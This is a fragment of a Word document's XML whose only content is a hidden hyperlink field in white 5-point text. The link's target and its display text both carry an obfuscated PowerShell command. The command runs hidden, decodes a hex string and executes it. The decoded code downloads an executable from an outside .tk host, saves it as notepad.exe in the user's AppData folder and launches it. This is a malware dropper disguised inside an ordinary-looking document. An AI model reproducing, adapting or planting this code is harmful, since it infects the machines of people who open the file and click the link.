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558DAC" w14:textId="7DF9F3A8" w:rsidR="00B07850" w:rsidRDefault="00491E4F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "file://C:\\Users\\admin\\Desktop\\Cabinmyke%20gui\\Powershell.exe%20%20-w%20h%20$asciiChars='27@28@26@27@2B@27@28@47@27@2B@27@43@27@2B@27@5E@23@5E@27@2E@72@65@70@6C@61@63@65@28@27@5E@23@5E@27@2C@27@4D@27@29@2B@27@20@2A@57@2D@27@2B@27@4F@2A@29@2</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>7@2B@20@27@4E@65@27@2B@27@74@2E@27@2B@27@57@27@2B@27@65@62@27@2B@27@43@27@2B@27@6C@69@27@2B@27@65@6E@74@29@27@2B@27@2E@44@27@2B@27@6F@77@27@2B@27@6E@6C@27@2B@27@6F@61@27@2B@27@64@27@2B@27@46@27@2B@27@69@6C@27@2B@27@65@28@27@27@68@74@74@70@3A@2F@2F@6A@75@6D</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>@6D@6D@2E@74@6B@2F@69@6E@2E@65@78@65@27@27@2C@24@65@6E@76@3A@41@50@50@44@41@54@41@2B@27@27@5C@6E@6F@74@65@70@61@64@2E@65@78@65@27@27@29@27@7C@49@60@45@60@58@3B@73@74@61@72@74@2D@70@72@6F@63@65@73@73@28@24@65@6E@76@3A@41@50@50@44@41@54@41@2B@20@27@5C@6E@6F@</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">74@65@70@61@64@2E@65@78@65@27@29';$jm=$asciiChars.Split('@')%20|%20forEach%20%7b%5bchar%5d(%5bconvert%5d::toint16($_,16))%7d;$jm%20-join%20''|I%60E%60X" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00917A78" w:rsidRPr="00917A78">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell.exe  -w h $asciiChars='27@28@26@27@2B@27@28@47@27@2B@27@43@27@2B@27@5E@23@5E@27@2E@72@65@70@6C@61@63@65@28@27@5E@23@5E@27@2C@27@4D@27@29@2B@27@20@2A@57@2D@27@2B@27@4F@2A@29@27@2B@20@27@4E@65@27@2B@27@74@2E@27@2B@27@57@27@2B@27@65@62@27@2B@27@43@27@2B@27@6C@69@27@2B@27@65@6E@74@29@27@2B@27@2E@44@27@2B@27@6F@77@27@2B@27@6E@6C@27@2B@27@6F@61@27@2B@27@64@27@2B@27@46@27@2B@27@69@6C@27@2B@27@65@28@27@27@68@74@74@70@3A@2F@2F@6A@75@6D@6D@6D@2E@74@6B@2F@69@6E@2E@65@78@65@27@27@2C@24@65@6E@76@3A@41@50@50@44@41@54@41@2B@27@27@5C@6E@6F@74@65@70@61@64@2E@65@78@65@27@27@29@27@7C@49@60@45@60@58@3B@73@74@61@72@74@2D@70@72@6F@63@65@73@73@28@24@65@6E@76@3A@41@50@50@44@41@54@41@2B@20@27@5C@6E@6F@74@65@70@61@64@2E@65@78@65@27@29';$jm=$asciiChars.Split('@') | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917A78" w:rsidRPr="00917A78">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917A78" w:rsidRPr="00917A78">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> {[char]([convert]::toint16($_,16))};$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917A78" w:rsidRPr="00917A78">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>jm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917A78" w:rsidRPr="00917A78">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> -join ''|I`E`X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905747E" w14:textId="61530320" w:rsidR="00491E4F" w:rsidRDefault="00491E4F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48ABDE7B" w14:textId="0482F831" w:rsidR="00491E4F" w:rsidRDefault="00491E4F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F782BAB" w14:textId="2FD102F6" w:rsidR="00491E4F" w:rsidRPr="00917A78" w:rsidRDefault="00491E4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5258E5FD" wp14:editId="58F95A07">
            <wp:extent cx="5073650" cy="33020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73650" cy="330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91E4F" w:rsidRPr="00917A7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7EB7"/>
    <w:rsid w:val="00142351"/>
    <w:rsid w:val="00287EB7"/>
    <w:rsid w:val="0043096E"/>
    <w:rsid w:val="00491E4F"/>
    <w:rsid w:val="00917A78"/>
    <w:rsid w:val="00B078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378227"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6BEC4674-D0C1-46A6-A9A6-21E63CE524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917A78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17A78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261</Words>
  <Characters>1490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mnb joker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>test</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-06T01:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-06T02:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>